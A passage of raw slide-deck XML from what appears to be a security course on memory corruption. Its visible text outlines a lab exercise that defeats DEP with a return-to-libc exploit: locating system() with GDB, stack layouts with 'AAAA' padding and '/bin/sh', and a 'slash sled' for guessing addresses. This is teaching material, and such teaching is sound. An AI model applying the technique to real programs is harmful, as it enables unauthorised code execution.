          <a:off x="7715250" y="16827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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1842775"/>
              </a:tblGrid>
              <a:tr h="206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Stack (After)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5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“/bin/sh”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5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0xBFFF????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E46C0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AAAA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0xB7E42DB0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AAAA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AAAA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5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AAAA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5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AAAA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AAAA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AAAA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AAAA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64150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="8382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 Library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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="793" name="Google Shape;793;g24e5311e72c_0_654"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9630602" y="2490785"/>
            <a:ext cx="228652" cy="259080"/>
            <a:chOff x="7725602" y="2262185"/>
            <a:chExt cx="228652" cy="259080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="794" name="Google Shape;794;g24e5311e72c_0_6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25602" y="2404483"/>
              <a:ext cx="228652" cy="1165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5" name="Google Shape;795;g24e5311e72c_0_654"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7725602" y="2262185"/>
              <a:ext cx="228600" cy="259080"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="259080" w="228600">
                  <a:moveTo>
                    <a:pt x="228600" y="170873"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="216004" y="142061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="117020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126519" y="97618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="85723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="54357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="28575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126519" y="40469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180723" y="59871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216004" y="84912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228599" y="113725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="170873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220434" y="194252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161644" y="233059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115378" y="246810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60770" y="255675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="258816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56926" y="198902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109139" y="190998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154507" y="178540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190902" y="162112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216196" y="142298"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="0AD4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6" name="Google Shape;796;g24e5311e72c_0_654"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9651996" y="3124200"/>
            <a:ext cx="414655" cy="2676525"/>
            <a:chOff x="7746996" y="2895600"/>
            <a:chExt cx="414655" cy="2676525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="797" name="Google Shape;797;g24e5311e72c_0_654"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7746997" y="2895600"/>
              <a:ext cx="414654" cy="1332864"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1332864" w="414654">
                  <a:moveTo>
                    <a:pt x="5589" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="103601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22854" y="105519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45393" y="111208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89392" y="133506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131733" y="169712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172151" y="219043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210382" y="280716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228595" y="315935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246163" y="353947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263052" y="394652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279230" y="437953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294662" y="483752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309318" y="531951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323162" y="582452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336164" y="635157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348288" y="689969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359503" y="746789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369776" y="805520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379073" y="866063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387361" y="928321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394609" y="992196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400781" y="1057590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405846" y="1124405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409771" y="1192543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412522" y="1261906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414066" y="1332396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414383" y="1264369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413558" y="1197124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411620" y="1130754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408596" y="1065350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404513" y="1001006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399400" y="937812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393282" y="875860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386189" y="815243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378146" y="756053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369183" y="698382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359325" y="642321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348601" y="587963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337039" y="535400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324665" y="484723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311507" y="436025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297592" y="389398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282948" y="344934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267603" y="302724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251584" y="262861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234918" y="225437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217632" y="190544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181314" y="128718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142848" y="78119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102454" y="39484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60352" y="13548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16762" y="1047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11177" y="349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5589" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000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g24e5311e72c_0_654"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7746996" y="2895600"/>
              <a:ext cx="414654" cy="2676525"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2676525" w="414654">
                  <a:moveTo>
                    <a:pt x="414407" y="1280595"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="413843" y="1347629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412170" y="1413908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409412" y="1479332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405594" y="1543802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400741" y="1607221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394876" y="1669487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388027" y="1730504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380216" y="1790170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371469" y="1848388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361811" y="1905059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351266" y="1960083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339860" y="2013362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327617" y="2064796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314562" y="2114286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300720" y="2161733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286115" y="2207039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270773" y="2250105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254719" y="2290830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237976" y="2329117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220570" y="2364867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183869" y="2428356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144813" y="2480506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103601" y="2520525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103602" y="2468723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2612990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103602" y="2675928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103602" y="2624127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124464" y="2605683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164623" y="2559499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202526" y="2501581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237976" y="2432719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254719" y="2394432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270773" y="2353706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286116" y="2310641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300720" y="2265335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314562" y="2217887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327617" y="2168397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339860" y="2116963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351266" y="2063684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361811" y="2008660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371469" y="1951990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380216" y="1893771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388027" y="1834105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394876" y="1773088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400741" y="1710821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405594" y="1647403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409412" y="1582932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412170" y="1517508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413843" y="1451229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414407" y="1384195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414407" y="1280595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413793" y="1210332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411975" y="1141060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408983" y="1072876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404848" y="1005877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399604" y="940162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393280" y="875828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385909" y="812972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377522" y="751693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368151" y="692088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357828" y="634254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346584" y="578289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334450" y="524292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321459" y="472359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307641" y="422588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293030" y="375077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277655" y="329924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261549" y="287226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244743" y="247080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227269" y="209585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209159" y="174838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171155" y="113980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130984" y="65285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88900" y="29536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45154" y="7514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="103602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22854" y="105520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45393" y="111208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89393" y="133506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131733" y="169712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172151" y="219043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210383" y="280716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228596" y="315936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246164" y="353947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263053" y="394652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279230" y="437953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294663" y="483752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309318" y="531951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323163" y="582452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336164" y="635157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348289" y="689969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359504" y="746789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369777" y="805520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379074" y="866063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387362" y="928321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394609" y="992196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400782" y="1057590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405847" y="1124405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409772" y="1192542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412523" y="1261906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414067" y="1332396"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="0AD4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24e5311e72c_0_672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Exercise: memcor/readData4/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;g24e5311e72c_0_67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Objective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Defeat DEP with a return-to-libc exploit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Procedure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Compile program with DEP enabled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$ make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Get (static) address of system() using GDB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Run program to get hint of dataBuffer address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Calculate address of our command string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Craft exploit file in python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Exploit program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./readData4 [file]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Hint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Determine the address of command using the address of dataBuffer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24e5311e72c_0_678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about “BBBB”?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="812" name="Google Shape;812;g24e5311e72c_0_67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This field is where system(0 will return when it exits, i.e. the saved EIP of the system() stack frame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can ignore this field and the program will crash after system executes our command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e.g. just fill it with BBBB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OR you can make it exit cleanly by using the address of libc exit()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(gdb) p exit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24e5311e72c_0_684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Slash sled</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Google Shape;819;g24e5311e72c_0_68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Without a hint we need to guess the address of the command string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Can we use a NOP sled?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NOPe, but we can use a “Slash Sled”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These commands are equivalent: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System(“/bin/sh”);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System(“////////////////bin/sh”);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can use a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>slash sled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> to increase (up to a limit) our odds of finding the address of our string in memory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24e5311e72c_0_690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Slightly improved odds</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="826" name="Google Shape;826;g24e5311e72c_0_690"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6953250" y="1593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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1657350"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="283210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Stack (After)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534670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5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command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5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////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5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5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////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5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////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5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////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191770" rtl="0" algn="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5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Command Address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E46C0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AAAA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151130" rtl="0" algn="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System() Address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AAAA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AAAA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AAAA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3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AAAA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AAAA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AAAA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AAAA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7" name="Google Shape;827;g24e5311e72c_0_690"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3676650" y="1593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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1581150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Stack (Before)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E46C0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&amp;fileName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Saved EIP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Saved EBP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&amp;filePointer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dataBuffer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3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dataBuffer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dataBuffer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dataBuffer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dataBuffer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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="828" name="Google Shape;828;g24e5311e72c_0_690"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8686800" y="2247900"/>
            <a:ext cx="457442" cy="1477644"/>
            <a:chOff x="7391400" y="1714500"/>
            <a:chExt cx="457442" cy="1477644"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="829" name="Google Shape;829;g24e5311e72c_0_690"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7391400" y="1714500"/>
              <a:ext cx="266700" cy="1295400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1295400" w="266700">
                  <a:moveTo>
                    <a:pt x="266700" y="1295400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="214794" y="1293653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172407" y="1288890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143829" y="1281826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133350" y="1273176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133350" y="669923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122870" y="661273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94292" y="654209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51905" y="649446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51905" y="645953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94292" y="641190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122870" y="634126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133350" y="625476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133350" y="22223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143829" y="13573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172407" y="6509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214794" y="1746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266700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g24e5311e72c_0_690"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7648576" y="2590800"/>
              <a:ext cx="200025" cy="601344"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="601344" w="200025">
                  <a:moveTo>
                    <a:pt x="0" y="267295"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="79" y="318411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3675" y="368416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14292" y="416582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31237" y="460740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53896" y="499831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81655" y="532795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113900" y="558574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150017" y="576108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150017" y="601112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200023" y="559593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171393" y="526103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150017" y="526103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113899" y="508569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81654" y="482790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53896" y="449826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31237" y="410735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14292" y="366577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3675" y="318411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1797" y="292299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876" y="292299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937" y="280329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="267295"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="601344" w="200025">
                  <a:moveTo>
                    <a:pt x="150017" y="501100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150017" y="526103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171393" y="526103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150017" y="501100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="601344" w="200025">
                  <a:moveTo>
                    <a:pt x="937" y="280329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="876" y="292299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1502" y="288197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937" y="280329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="601344" w="200025">
                  <a:moveTo>
                    <a:pt x="1502" y="288197"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="876" y="292299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1797" y="292299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1502" y="288197"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="601344" w="200025">
                  <a:moveTo>
                    <a:pt x="200023" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="193776" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187533" y="391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141559" y="11617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105267" y="31817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73164" y="60601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45975" y="96797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24412" y="139280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9243" y="186746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1151" y="238157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937" y="280329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1502" y="288197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9531" y="235636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26523" y="184206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50846" y="139236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81347" y="102127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117090" y="74017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156997" y="56220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200023" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000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g24e5311e72c_0_690"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
